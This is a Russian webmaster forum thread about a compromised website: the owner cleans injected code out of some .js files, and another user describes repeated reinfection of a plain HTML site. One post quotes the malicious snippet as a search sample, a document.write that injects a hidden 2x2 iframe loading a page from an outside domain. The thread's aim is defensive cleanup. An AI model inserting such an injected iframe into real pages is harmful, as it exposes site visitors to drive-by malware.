Неизвестный вирус на сайте

Нет, теперь не ругается.

Оффтоп. Полазил по сайту - много орфографических ошибок :)

У меня норм каспер не ругается, я и не думал что можно юкоз сайт так заразить.

1. Отлично! Осталось только посмотреть на реакцию Яндекса. Вчера служба поддержки Яндекса ответила, что просмотрит детально сайт на наличие вредоносного ПО.

2. Пароли поменял.

3. О результатах потом обязательно отпишусь, чтобы остальные вебмастера могли решить похожую проблему.

P.S. Это уже другой вопрос для другой темы. Сайт большой и исправлять все моментально я не могу. Нужно будет установить какой-то сервис для оповещения ошибок. В комментариях также об этом пишут.

ТС не ориентируйтесь на сервисы, т.к. они не покажут вам точную картину, проверьте сайт глазами потом уже анализируйте.

Своими глазами я нашел код (о нем я писал выше), который хранился в *.js файлах.

Странно то, что он был размещен не во всех, а в определенных *.js файлах, которые между собой вообще никак не связаны. Это немного усложнило процесс поиска кода.

Использую NOD32, но он не нашел никаких вирусов на сайте. Буду очень благодарен за получение "ругательных текстов" от других антивирусных систем. Это значительно ускорит процесс поиска вредоносного ПО.

Значительно ускорился б этот процесс, если бы был прочтён закреплённый топик в этом разделе.

Ссылки не даю - хоть с этим сам справься ;)

Читал, нет доступа к файлу .htaccess, писал в тех.поддержку, чтобы предоставили возможность его редактировать. Пока молчат.

Проблемный код найден, очищен в тех файлах, которые его использовали. Полностью ли удален вредоносный код с сайта - будет известно после обновления сайта Яндексом.

Всем вебмастерам, которые столкнутся с данной проблемой:

ищите в файлах *.js (возможно, будут другие форматы), дописанный код типа

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wbny.html?j=2827125></iframe>');

О результатах отпишусь после обновления сайта.

Афигеть! Это что за хостинг такой? Фрихост чоли?

Писал уже об этом тут: /ru/forum/comment/11621543

Интересно другое - если я только что изменил пароли, то не узнает ли об этом злоумышленник? Ведь, насколько я понял, файлы редактировались путем проникновения на сервер (фтп)?

Добрый день)

я почти чайник.......

проблемма абсолютно такая же Troj/Iframe-JG...

но с продолжением)

сайт у меня простой html

технически весьма примитивный, написан руками поэтому где какая буква в кодах моя я знаю

http://kalevallafold.ru/ один из...

проблема в том, что "не мои" вредоносные участки в коде стр. и папках я вижу

.htaccess в корневой нету

есть все сайты на домашнем компе.. в "домашних" вариантах чисто..

удалила с хостинга все левые папки, перекачала все стр. , dr web оценил сайт как чистый, сменила пароли...

на след. день все заново произошло... и так 3 день((

яндекс ругается на зараженные сайты - гугл нет..

вопрос: может ли эта зараза быть с моего компа?

свой Dr.Web CureIt проверила вдоль и поперек - пишет нет угроз никаких(